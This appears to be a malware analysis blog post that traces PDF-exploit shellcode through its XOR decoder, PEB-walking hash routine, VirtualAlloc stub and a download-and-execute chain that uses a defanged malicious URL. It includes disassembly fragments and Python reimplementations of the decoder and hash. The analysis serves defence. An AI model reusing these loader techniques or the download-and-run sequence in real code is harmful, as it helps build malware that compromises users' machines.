ADDRESS    DISASSEMBLY            COUNT  EXE COUNT
0x40ffe9   mov ecx,0x389          1      1
0x40ffee   mov esi,[esp]          1      2
0x40fff1   mov edi,esi            1      3
0x40fff3   push esi               1      4
0x40fff4   cmp byte [esi],0x5e    1      5
0x40fff7   jz 0x40ffff            1      6
0x40fff9   lodsb                  905    3623
0x40fffa   xor al,0xdc            905    3624
0x40fffc   stosb                  905    3625
0x40fffd   loop 0x40fff9          905    3626
0x40ffff   ret                    1      3627
0x410000   call 0x40ffe9          1      0
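The loop in this listing reads a byte, XORs it with 0xdc, and writes it back, 0x389 times. A minimal Python equivalent is sketched below; the function name is ours, and the sample input is the six bytes that appear to follow the call instruction in the decoded string.

```python
KEY = 0xDC

def xor_decode(data, key=KEY):
    """XOR every byte with the key, mirroring the lodsb / xor / stosb loop."""
    # Like the stub's cmp/jz check: a leading 0x5e means the data is already decoded.
    if data[:1] == b"\x5e":
        return bytes(data)
    return bytes(b ^ key for b in data)

encoded = bytes.fromhex("8251aac83486")
print(xor_decode(encoded).hex())  # 5e8d7614e85a
```

The first decoded byte is 0x5e, which is the value the stub compares against before deciding whether to run the loop.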
The shellcode deobfuscates the rest of the shellcode with the XOR key 0xdc. Then it goes to find the base address of kernel32. It uses the well known technique of using the Process Environment Block (PEB) to walk the list of loaded modules in the current process. This particular shellcode walks the InMemoryOrder list. As it walks the loaded modules list, it creates a simple hash of the DLL name and compares it to the hash value precalculated for kernel32 (0x6e2bca17).
ADDRESS    DISASSEMBLY              COUNT  EXE COUNT
0x410256   pusha                    1      3635
0x410257   xor eax,eax              1      3636
0x410259   mov edx,fs:[eax+0x30]    1      3637
0x41025d   mov edx,[edx+0xc]        1      3638
0x410260   mov edx,[edx+0x14]       1      3639
0x410263   mov esi,[edx+0x28]       2      3749
0x410266   xor edi,edi              2      3750
0x410268   xor eax,eax              23     3880
0x41026a   lodsb                    23     3881
0x41026b   inc esi                  23     3882
0x41026c   test eax,eax             23     3883
0x41026e   jz 0x41027d              23     3884
0x410270   cmp al,0x61              21     3874
0x410272   jl 0x410276              21     3875
0x410274   sub al,0x20              17     3876
0x410276   ror edi,0xd              21     3877
0x410279   add edi,eax              21     3878
0x41027b   jmp 0x410268             21     3879
0x41027d   cmp edi,[esp+0x24]       2      3885
0x410281   mov eax,[edx+0x10]       2      3886
0x410284   mov edx,[edx]            2      3887
0x410286   jnz 0x410263             2      3888
0x410288   mov [esp+0x1c],eax       1      3889
0x41028c   popa                     1      3890
0x41028d   retn 0x4                 1      3891
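The inner loop of this listing is a rotate-and-add hash over the module name. The sketch below mirrors those instructions in Python as we read them; the function names are ours. Whether it reproduces 0x6e2bca17 depends on the exact name string Windows stores for the module, so no expected value is shown for the real DLL name.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def module_name_hash(name):
    """Hash a module name the way the loop above appears to."""
    h = 0
    # lodsb + inc esi: only the low byte of each UTF-16 code unit is used.
    for ch in name.encode("utf-16-le")[::2]:
        if ch == 0:               # test eax,eax / jz: stop at the terminator
            break
        if 0x61 <= ch < 0x80:     # cmp al,0x61 / jl is a signed compare
            ch -= 0x20            # sub al,0x20: fold lowercase to uppercase
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF  # ror edi,0xd / add edi,eax
    return h

print(hex(module_name_hash("AB")))  # 0x2080042
print(hex(module_name_hash("kernel32.dll")))
```

Folding to uppercase before hashing makes the comparison independent of how the loader happens to store the name’s case.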
The shellcode then walks kernel32’s export table to find the function VirtualAlloc and calls it.
ADDRESS    DISASSEMBLY          COUNT  EXE COUNT
0x410172   push byte 0x40       1      4700
0x410174   push dword 0x1000    1      4701
0x410179   push byte 0x1        1      4702
0x41017b   push byte 0x0        1      4703
0x41017d   call eax             1      4704
Or, in a more readable format:
kernel32.VirtualAlloc(lpAddress=0x0, dwSize=0x1, flAllocationType=0x1000, flProtect=0x40)
Interestingly, only one byte is requested. However, since lpAddress is NULL, the requested size is rounded up to the next page boundary, so a full page is allocated. The shellcode relies on this, since it then copies 0x375 bytes into that newly allocated space and jumps into it.
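The arithmetic behind this can be checked quickly. The snippet assumes a 4 KiB page size, which is typical for x86 Windows but is not stated in the trace; the helper name is ours.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def round_up_to_page(size, page_size=PAGE_SIZE):
    """Round a requested size up to a whole number of pages."""
    return (size + page_size - 1) // page_size * page_size

allocated = round_up_to_page(0x1)
print(hex(allocated), 0x375 <= allocated)  # 0x1000 True
```

Under that assumption, a one-byte request yields 0x1000 usable bytes, comfortably more than the 0x375 bytes the shellcode copies.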
ADDRESS    DISASSEMBLY      COUNT  EXE COUNT
0x41000e   mov ecx,0x375    1      4712
0x410013   mov edi,eax      1      4713
0x410015   rep movsb        1      4714
0x410017   jmp eax          1      4715
The shellcode then proceeds to do several interesting things. Instead of loading DLLs with LoadLibraryA from kernel32, it finds most of them the same way it finds kernel32: by going through the PEB to the loaded modules list. It does eventually find LoadLibraryA and use it to load urlmon.dll so it can download the next stage from the internet. It also relies on the API calls that use wide characters rather than ASCII. Finally, there are two different execution paths, one for Windows XP and earlier, and one for Windows Vista and later. The shellcode calls GetVersion from kernel32 to determine which version of Windows is running.
ADDRESS      DISASSEMBLY    COUNT  EXE COUNT
0xf000003f   call eax       1      12078
0x410017     cmp al,0x6     1      12085
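The comparison against al works because GetVersion packs the major version into the lowest byte of its return value and the minor version into the next byte. A short sketch of that decoding follows; the function names and the two sample return values are hypothetical, and the exact branch condition the shellcode uses after the cmp is an assumption.

```python
def decode_get_version(value):
    """Split a GetVersion-style DWORD into (major, minor)."""
    major = value & 0xFF          # low byte of the low word (this is what al holds)
    minor = (value >> 8) & 0xFF   # high byte of the low word
    return major, minor

def takes_vista_path(value):
    # Assumption: the branch after "cmp al,0x6" treats major >= 6 as Vista or later.
    return decode_get_version(value)[0] >= 6

# Hypothetical return values: 5.1 with build 2600, and 6.1 with build 7601.
for sample in (0x0A280105, 0x1DB10106):
    print(hex(sample), decode_get_version(sample), takes_vista_path(sample))
```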

The shellcode checks the major version of the OS. Microsoft documents those values. The short story is that 6 is Windows Vista and later, and 5 is Windows XP and earlier. For Windows Vista and later, the shellcode finds advapi32 and shell32 through the process’s loaded modules, not by using LoadLibraryA. In all, the DLL calls made are:
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
advapi32.OpenProcessToken()
shell32.ShellExecuteExW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
For Windows XP and earlier, the net result is the same; only the DLL functions called are different:
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
kernel32.CreateProcessW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()


This analysis was possible because of the changes we made in pdf.py in jsunpack. We added support for detecting XFA objects and then parsing the XML data to extract the JavaScript and the rawValue data associated with it. Again, these modifications have been shared back to the jsunpack project.
Post written by David Dorsey of Visiblerisk, Inc.
